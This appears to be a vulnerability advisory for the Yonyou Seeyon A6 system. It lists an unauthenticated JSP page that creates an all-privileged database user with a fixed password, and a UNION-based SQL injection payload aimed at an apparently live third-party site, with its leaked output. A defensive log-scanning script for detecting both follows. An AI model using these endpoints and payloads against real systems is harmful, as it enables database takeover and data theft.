### Summary:
Yonyou Seeyon A6 collaboration system: sensitive information disclosure & SQL injection (UNION-based, can lead to a shell)
### Details:
#1 Database account password reset vulnerability
```
/yyoa/ext/byoa/start.jsp
```
The code of this file is:
```
<%@ page import="java.sql.Connection, java.sql.PreparedStatement" %>
<%
// No session, login or role check of any kind precedes the statements below.
Connection conn = null;
PreparedStatement pstmt = null;
String sql = "create user byoa IDENTIFIED by 'byoa'";
try {
    // Connection from the application's pool (shown commented out in this listing).
    conn = null;//net.btdz.oa.common.ConnectionPoolBean.getConnection();
    // Create the byoa account and echo the row count to the HTTP response.
    pstmt = conn.prepareStatement(sql);
    out.print(pstmt.executeUpdate());
    // Grant it every privilege on every database.
    sql = "grant all on *.* to byoa";
    pstmt = conn.prepareStatement(sql);
    out.println(pstmt.executeUpdate());
    pstmt.close();
    // Force the password back to the fixed value 'byoa'.
    sql = "update mysql.user set password=password('byoa') where user='byoa'";
    pstmt = conn.prepareStatement(sql);
    out.println(pstmt.executeUpdate());
    pstmt.close();
    // Make the new grants and password take effect immediately.
    sql = "flush privileges";
    pstmt = conn.prepareStatement(sql);
    out.print(pstmt.executeUpdate());
    pstmt.close();
    //conn.close();
} catch (Exception ex) {
    // Any database error is written straight to the page.
    out.println(ex.getMessage());
}
%>
```
As can be seen, the file performs no permission check at all before it resets the password of database user byoa to: byoa (the listing also creates that user and grants it ALL on *.*)
#2 MySQL + JSP injection
```
/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp
```
Test method
```
http://www.ssepec.net/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=(17) union all select user()%23
{'success':false,'errors':'root@localhost'}
```
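A defender's detection check covering both endpoints above (#1 and #2), as an added example that is not part of the original advisory or of the product: it scans web-server access log lines for any request to the unauthenticated start.jsp page and for isNotInTable.jsp calls whose user_ids parameter is not a plain numeric id list. The combined-style log format, the expected shape of user_ids, and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Paths named in the advisory (constants, not project code).
RESET_PATH = "/yyoa/ext/byoa/start.jsp"
INJECT_PATH = "/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp"

# Assumption: user_ids is a parenthesised list of numeric ids, e.g. "(17)" or "(3,17)".
ID_LIST = re.compile(r"^\(?\s*\d+(\s*,\s*\d+)*\s*\)?$")

# Combined-style access log: client - - [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(line):
    """Return (client, reason) if the request line is suspicious, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, _method, target, status = m.groups()
    parts = urlsplit(target)
    path = parts.path.lower()  # Windows-hosted Tomcat ignores path case
    if path == RESET_PATH.lower():
        # Any hit is worth an alert: the page needs no login to run its statements.
        return client, f"unauthenticated DB-account reset page requested (HTTP {status})"
    if path == INJECT_PATH.lower():
        # parse_qs percent-decodes, so %23 becomes the MySQL '#' comment marker.
        for value in parse_qs(parts.query, keep_blank_values=True).get("user_ids", []):
            if not ID_LIST.match(value):
                return client, f"user_ids is not a numeric id list: {value!r}"
    return None

def scan(lines):
    """Run classify over every line and keep the hits, in log order."""
    hits = []
    for line in lines:
        result = classify(line)
        if result:
            hits.append(result)
    return hits

# Constructed sample log lines (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2014:13:55:36 +0800] "GET /yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=(17) HTTP/1.1" 200 30',
    '203.0.113.5 - - [10/Oct/2014:13:55:40 +0800] "GET /yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=(17)%20union%20all%20select%20user()%23 HTTP/1.1" 200 45',
    '198.51.100.7 - - [10/Oct/2014:14:02:11 +0800] "GET /yyoa/ext/byoa/start.jsp HTTP/1.1" 200 4',
    '198.51.100.7 - - [10/Oct/2014:14:02:12 +0800] "GET /yyoa/index.jsp HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for client, reason in scan(SAMPLE_LOG):
        print(client, reason)
```

Only the UNION request and the start.jsp hit are reported; the benign `user_ids=(17)` call and the index page pass.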
### Proof of vulnerability:
Verified on 5 live instances: